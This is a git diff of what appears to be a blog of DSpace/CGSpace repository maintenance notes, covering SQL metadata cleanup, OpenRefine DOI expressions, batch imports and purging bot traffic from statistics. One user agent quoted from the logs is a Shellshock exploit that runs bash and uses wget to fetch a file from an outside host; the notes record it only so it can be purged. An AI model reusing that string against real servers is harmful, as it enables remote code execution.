                                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +-----------+---------
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + en_US     | 2838588
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + en        |    1082
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +           |     801
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + en_US.    |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +           |       0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1884
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I then exported the entire repository and did some cleanup on DOIs
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I found ~1,200 items with no cg.identifier.doi, but which had a DOI in their citation
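A minimal sketch, in Python, of how a DOI might be pulled out of a citation string for items like these. The regular expression, the function name `extract_doi`, the sample citation, and the choice to return an `https://doi.org/` URL are all assumptions for illustration, not the method used in these notes.

```python
import re

# Loose DOI pattern (an assumption, not an official grammar):
# "10.", a 4-9 digit registrant code, a slash, then a suffix without
# whitespace, quotes, or angle brackets.
DOI_PATTERN = re.compile(r"10\.\d{4,9}/[^\s\"<>]+")


def extract_doi(citation):
    """Return the first DOI-like string in a citation as a doi.org URL, or None."""
    match = DOI_PATTERN.search(citation)
    if match is None:
        return None
    # Citations often end with sentence punctuation that is not part of the DOI.
    # Caveat: a few real DOIs do end in ")", so results still need a manual check.
    doi = match.group(0).rstrip(".,;)")
    return f"https://doi.org/{doi}"


# Hypothetical citation, made up for this example
sample = "Doe, J. 2020. An example title. Journal 1(2). https://doi.org/10.1016/j.example.2020.01.001."
print(extract_doi(sample))
```

Anything extracted this way would still need review before being written to `cg.identifier.doi`, since the pattern is deliberately permissive.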
@@ -623,8 +623,8 @@ UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
• In most cases Crossref’s dates are more accurate than ours, though there are a few odd cases where I have not yet decided on a strategy
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Start a full harvest on AReS
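For reference, the date comparison in the GREL expression above can be sketched outside OpenRefine in Python. The function name `days_apart` and the sample dates are assumptions, and this version only handles full `YYYY-MM-DD` dates; values such as `2021` or `2021-03` would need extra handling.

```python
from datetime import date


def days_apart(issued, dcterms_issued):
    """Absolute number of days between two ISO 8601 dates (YYYY-MM-DD).

    Mirrors abs(diff(toDate(a), toDate(b), "days")) for full dates only.
    """
    a = date.fromisoformat(issued)
    b = date.fromisoformat(dcterms_issued)
    return abs((a - b).days)


# Hypothetical values: one date from the "issued" column and one from ours
print(days_apart("2021-03-01", "2021-01-01"))
```

Sorting or faceting on this number makes it easier to spot the records where the two dates disagree the most.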
                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -639,26 +639,26 @@ UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                or(
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1017"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1007"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1016"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1098"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1111"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1002"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1046"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.2135"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1006"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1177"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1079"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.2298"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1186"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.3835"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1128"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.3732"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.2134")
                                                                                                                                                                                                                                                                                                                                                                                                                                                -)
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  or(
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1017"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1007"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1016"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1098"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1111"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1002"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1046"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.2135"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1006"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1177"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1079"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.2298"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1186"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.3835"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1128"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.3732"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.2134")
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
• Many of Crossref’s records are correct where we have no license, and in some cases more correct where we have a different license
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I ran license updates on ~167 DOIs in the end on CGSpace
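For checking the same selection outside OpenRefine, here is a minimal Python sketch of the `or(value.contains(...), ...)` facet above. The prefix list is copied from that expression. The helper name `matches_known_prefix` and the sample values are hypothetical, added only for illustration. Like `value.contains()`, it does a plain substring test, so a prefix appearing elsewhere in the value (for example inside a DOI suffix) would also match.

```python
# DOI prefixes copied from the or(...) expression above.
DOI_PREFIXES = (
    "10.1017", "10.1007", "10.1016", "10.1098", "10.1111", "10.1002",
    "10.1046", "10.2135", "10.1006", "10.1177", "10.1079", "10.2298",
    "10.1186", "10.3835", "10.1128", "10.3732", "10.2134",
)


def matches_known_prefix(value: str) -> bool:
    """Return True if any listed prefix occurs anywhere in the value.

    This mirrors the substring semantics of value.contains(); it does not
    check that the prefix sits at the start of the DOI.
    """
    return any(prefix in value for prefix in DOI_PREFIXES)


# Hypothetical sample values, for illustration only.
samples = [
    "https://doi.org/10.1016/j.example.2020.01.001",
    "https://doi.org/10.9999/not-listed",
]

# Keep only the values that the facet would have selected.
selected = [s for s in samples if matches_known_prefix(s)]
```

Keeping the prefixes in one tuple makes it easier to add or remove a publisher than editing a long chain of `contains()` calls.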
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -669,11 +669,11 @@ value.contains("10.2134")
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Update some audience metadata on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -UPDATE 354
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2022-02-25

                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +UPDATE 354
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
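The two audience fixes above follow the same pattern, so they could be driven from a small mapping. The sketch below is an assumption-laden illustration, not the procedure used on CGSpace: it swaps PostgreSQL for an in-memory SQLite database, and the toy schema and rows are made up. Only the `UPDATE` statement shape, the field ID 144 and the value pairs come from the commands above.

```python
import sqlite3

# In-memory SQLite stand-in for the DSpace PostgreSQL database (assumption).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE item (uuid TEXT PRIMARY KEY);
CREATE TABLE metadatavalue (
    dspace_object_id TEXT,
    metadata_field_id INTEGER,
    text_value TEXT
);
INSERT INTO item VALUES ('a'), ('b');
INSERT INTO metadatavalue VALUES
    ('a', 144, 'Academicians'),
    ('b', 144, 'SCIENTISTS'),
    ('c', 144, 'Academicians'),  -- not an item, so left untouched
    ('a', 1,   'Academicians');  -- different field, so left untouched
""")

# Old value -> corrected value, taken from the UPDATE statements above.
REPLACEMENTS = {"Academicians": "Academics", "SCIENTISTS": "Scientists"}

updated = {}
for old, new in REPLACEMENTS.items():
    cur = conn.execute(
        "UPDATE metadatavalue SET text_value = ? "
        "WHERE dspace_object_id IN (SELECT uuid FROM item) "
        "AND metadata_field_id = 144 AND text_value = ?",
        (new, old),
    )
    # rowcount plays the role of psql's "UPDATE n" line.
    updated[old] = cur.rowcount
conn.commit()
```

Using bound parameters instead of string formatting avoids quoting problems if a replacement value ever contains an apostrophe.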

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2022-02-25

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401–700 in the spreadsheet)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -682,23 +682,23 @@ UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                        or(
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('405')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('410')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('412')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('414')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('419')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('436')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('448')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('449')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('450')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('405')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('410')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('412')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('414')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('419')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('436')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('448')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('449')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('450')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                         ...
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('699'))
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('699'))
                                                                                                                                                                                                                                                                                                                                                                                                                                                         )
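A minimal Python sketch of what the expression above appears to do, assuming GREL's `value.match()` only succeeds when the pattern matches the whole value. The ID list holds only the values visible in this hunk (the source elides the rest with `...`), and `is_flagged` is a hypothetical helper name, not part of OpenRefine:

```python
import re

# Only the IDs visible in the expression above; the rest are elided in the source.
VISIBLE_IDS = ["405", "410", "412", "414", "419", "436", "448", "449", "450", "699"]


def is_flagged(value, patterns=VISIBLE_IDS):
    """Return True when value matches any pattern in full.

    re.fullmatch stands in for GREL's whole-string match(); any() plays the
    role of the surrounding or(...).
    """
    return any(re.fullmatch(pattern, value) is not None for pattern in patterns)
```

Because the match is anchored to the whole value, an ID such as `4140` would not be flagged just because it contains `414`.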
                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2022-02-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2022-02-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Upgrade CGSpace (linode18) to Ubuntu 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a full AReS harvest
diff --git a/docs/2022-03/index.html b/docs/2022-03/index.html
index 1b342c6ec..2b40a6480 100644
--- a/docs/2022-03/index.html
+++ b/docs/2022-03/index.html
@@ -19,7 +19,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
-
+
@@ -34,7 +34,7 @@ $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu&
 $ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
 $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
 "/>
-
+
@@ -44,9 +44,9 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
   "@type": "BlogPosting",
   "headline": "March, 2022",
   "url": "https://alanorth.github.io/cgspace-notes/2022-03/",
-  "wordCount": "48",
+  "wordCount": "349",
   "datePublished": "2022-03-01T16:46:54+03:00",
-  "dateModified": "2022-03-01T16:46:54+03:00",
+  "dateModified": "2022-03-01T17:48:40+03:00",
   "author": {
     "@type": "Person",
     "name": "Alan Orth"
@@ -124,11 +124,67 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
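For reference, the final `csvjoin -c id` step above can be approximated with the Python standard library. This is only a sketch under stated assumptions: it performs an inner join on `id` (which I believe is csvjoin's default), the helper name `join_on_id` is hypothetical, and the sample rows are made up for illustration rather than taken from the TAC batch:

```python
import csv
import io


def join_on_id(left_rows, right_rows, key="id"):
    """Inner-join two lists of dict rows on key, keeping the left columns first."""
    # Index the right-hand rows by key so each left row is a dictionary lookup.
    right_by_key = {}
    for row in right_rows:
        right_by_key.setdefault(row[key], []).append(row)

    joined = []
    for left in left_rows:
        for right in right_by_key.get(left[key], []):
            merged = dict(left)
            for column, value in right.items():
                if column != key:  # do not repeat the join column
                    merged[column] = value
            joined.append(merged)
    return joined


# Hypothetical sample data standing in for the two CSV files.
duplicates_csv = "id,dc.title\n701,First report\n702,Second report\n"
filenames_csv = "id,filename\n701,first.pdf\n703,third.pdf\n"

left = list(csv.DictReader(io.StringIO(duplicates_csv)))
right = list(csv.DictReader(io.StringIO(filenames_csv)))
rows = join_on_id(left, right)
```

Only `id` 701 appears in both inputs, so `rows` holds a single merged record. If both files shared a non-key column name, this sketch would let the right-hand value overwrite the left one, which may differ from what csvjoin does.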

                                                                                                                                                                                                                                                                                                                                                                                                                                                          2022-03-04

                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Looking over the CGSpace Solr statistics from 2022-02 +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Here are some of the more prevalent or weird ones: +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • axios/0.21.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Nutraspace/Nutch-1.2 (www.nutraspace.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Crowsnest/0.5 (+http://www.crowsnest.tv/)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • metha/0.2.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • ZaloPC-win32-24v454
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • FullStoryBot/1.0 (+https://www.fullstory.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Link Validity Check From: http://www.usgs.gov
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • OSPScraper (+https://www.opensyllabusproject.org)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I submitted a pull request to COUNTER-Robots with some of these
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I purged a bunch of hits from the stats using the check-spider-hits.sh script:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 6 hits from scalaj-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 5 hits from lua-resty-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 9 hits from AHC in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 7 hits from acebookexternalhit in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1011 hits from axios\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 2216 hits from Faveeo\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1164 hits from Moreover\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 740 hits from Exploratodo\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 585 hits from GroupHigh\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 438 hits from Crowsnest\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1326 hits from nbertaupete95 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 182 hits from metha\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 68 hits from ZaloPC-win32-24v454 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1644 hits from Firefox\/x\.x in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 678 hits from ZoteroTranslationServer in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 27 hits from FullStoryBot in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 26 hits from Link Validity Check in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 26 hits from OSPScraper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1 hits from 3137382e37392e3138372e313832 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 2755 hits from Nutch-[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Total number of bot hits purged: 12914
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • +
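The patterns in the purge output above look like regular expressions matched against the user agent string. As a rough illustration only (this is not how `check-spider-hits.sh` itself queries Solr, which is not shown here), the following sketch tallies sample user agents against a subset of those patterns. The names `PATTERNS`, `first_match`, `tally` and `SAMPLE` are hypothetical, and the last sample user agent is an invented ordinary browser string included to show a non-match.

```python
import re
from collections import Counter

# A subset of the patterns from the purge output above. Assumption: each one
# is a case-sensitive regular expression searched anywhere in the user agent.
PATTERNS = [
    r"axios\/[0-9]",
    r"Faveeo\/[0-9]",
    r"Nutch-[0-9]",
    r"Firefox\/x\.x",
    r"Link Validity Check",
]


def first_match(user_agent, patterns=PATTERNS):
    """Return the first pattern found in the user agent, or None."""
    for pattern in patterns:
        if re.search(pattern, user_agent):
            return pattern
    return None


def tally(user_agents, patterns=PATTERNS):
    """Count how many user agents hit each pattern (first match wins)."""
    counts = Counter()
    for user_agent in user_agents:
        matched = first_match(user_agent, patterns)
        if matched is not None:
            counts[matched] += 1
    return counts


# The first four strings come from the list of user agents above; the last
# one is a made-up regular browser that should not match any pattern.
SAMPLE = [
    "axios/0.21.1",
    "Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)",
    "Nutraspace/Nutch-1.2 (www.nutraspace.com)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x",
    "Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
]

if __name__ == "__main__":
    for pattern, hits in tally(SAMPLE).items():
        print(f"{hits} sample hit(s) for {pattern}")
```

Anchoring on a version separator such as `\/[0-9]` keeps a pattern like `axios` from matching unrelated strings that merely contain the word, which is presumably why several of the entries above are written that way.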
+
diff --git a/docs/404.html b/docs/404.html
index 346a9a9be..bad881cbf 100644
--- a/docs/404.html
+++ b/docs/404.html
@@ -17,7 +17,7 @@
-
+
diff --git a/docs/categories/index.html b/docs/categories/index.html
